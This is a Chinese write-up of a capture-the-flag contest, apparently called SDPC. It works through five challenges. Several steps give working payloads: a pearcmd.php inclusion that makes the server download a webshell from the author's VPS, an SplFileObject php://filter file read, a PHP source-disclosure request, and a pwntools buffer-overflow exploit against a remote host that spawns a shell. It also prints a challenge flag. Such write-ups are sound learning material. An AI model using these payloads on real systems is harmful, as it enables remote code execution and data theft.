简单玩了一下,挺好玩的比赛,也学到很多知识,
🐎一个做题记录,后期把没来的做的题再复现一下。
0x00 ezinclude
包含主页时发现有pearcmd.php:
pear会在pearcmd.php
获取命令行参数,存在pearcmd.php
,说明该环境安装了pear。
php的pear扩展是一个命令行扩展管理工具,默认的安装路径在
/usr/local/lib/php/pearcmd.php
,在命令行下可以用pear
或php /usr/local/lib/php/pearcmd.php
运行,虽然不是在web的目录下,但是如果存在文件包含漏洞,就可以运行这个命令行工具。
把🐎写在自己的VPS里,让其远程下载即可。
利用方式:
sdpc=/usr/local/lib/php/pearcmd.php&+install+-R+/tmp+http://<ip>/8848.php
传参?sdpc=/tmp/tmp/pear/download/8848.php
,蚁🗡连接成功,flag在/var/www/public/flag.php中。
0x01 ezphp
<?php error_reporting(0); highlight_file(__FILE__); $g = $_GET['g']; $t = $_GET['t']; echo new $g($t);
看见echo new $g($t);
可能是考察原生类利用,考虑使用SplFileObject
类。
通过echo触发
SplFileObject
中的__toString()
方法。
?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php
学习更多:戳我
0x02 funnyPHP
PHP <= 7.4.21远程源码泄露漏洞
勾掉Content-Length:
发包:
GET /puzzle.php HTTP/1.1 Host: 47.104.14.160:3345 GET / HTTP/1.1
得到puzzle.php的源码:
<?php error_reporting(0); class A{ public $sdpc = ["welcome" => "yeah, something hidden."]; function __call($name, $arguments) { $this->$name[$name](); } } class B{ public $a; function __construct() { $this->a = new A(); } function __toString() { echo $this->a->sdpc["welcome"]; } } class C{ public $b; protected $c; function __construct(){ $this->c = new B(); } function __destruct(){ $this->b ? $this->c->sdpc('welcom') : 'welcome!'.$this->c; } } class Evil{ function getflag() { echo file_get_contents('/fl4g'); } } if(isset($_POST['sdpc'])) { unserialize($_POST['sdpc']); } else { serialize(new C()); } ?>
又来了,恶心的反序列化泡泡龙> <。
0x03 ez_stack
main:
int __cdecl v(int a1) { char s[68]; // [esp+0h] [ebp-48h] BYREF io(); printf("Password reset 2.0 : "); gets(s); if ( a1 != -20221119 ) return puts(asc_804A02E); puts(asc_804A01E); return system("/bin/sh"); }
分析代码得知,要想执行return system("/bin/sh")
,需要让a1等于-20221119。
cmp处的text段地址为080492B3,溢出后下断点调试:
from pwn import * io = process("./ez_stack") gdb.attach(io,"b * 0x80492B3") sleep(1) io.recvuntil("Password reset 2.0 : ") payload = cyclic(100) io.sendline(payload) io.interactive()
查看ebp+0x8的位置,cyclic -l 0x61616175
得知其在81位(前面有80个字符)。
from pwn import * io = remote('1.13.251.106','8000') #io = process("./ez_stack") #gdb.attach(io,"b * 0x80492B3") #sleep(1) io.recvuntil("Password reset 2.0 : ") payload = 'a'*80+p32(0xfecb7341) io.sendline(payload) io.interactive()
0x04 CheckIn
282422904082982258621075610259452215824075271484821245626055284049965141753838118483499225118037659155776469308266679236514939371151200503486860900710638249138056870980395564136760046944176702722154502092895865522544199762580857041717582699398798829888596539858995029585412945532785867079274113878154724845910389733183058666310229884356997245
转成16进制:
4d752e4368656e5f69735f7468655f6d6f73745f68616e64736f6d655f626f795f696e5f534450435f616e645f68655f646f6e27745f686176655f6769726c667269656e642121212121212142795f7468655f7761795f686572655f69735f796f75725f666c61677b37303562633765612d653965312d343939362d613238662d6464393632613737373137307d
再转为字符:
Mu.Chen_is_the_most_handsome_boy_in_SDPC_and_he_don't_have_girlfriend!!!!!!!By_the_way_here_is_your_flag{705bc7ea-e9e1-4996-a28f-dd962a777170}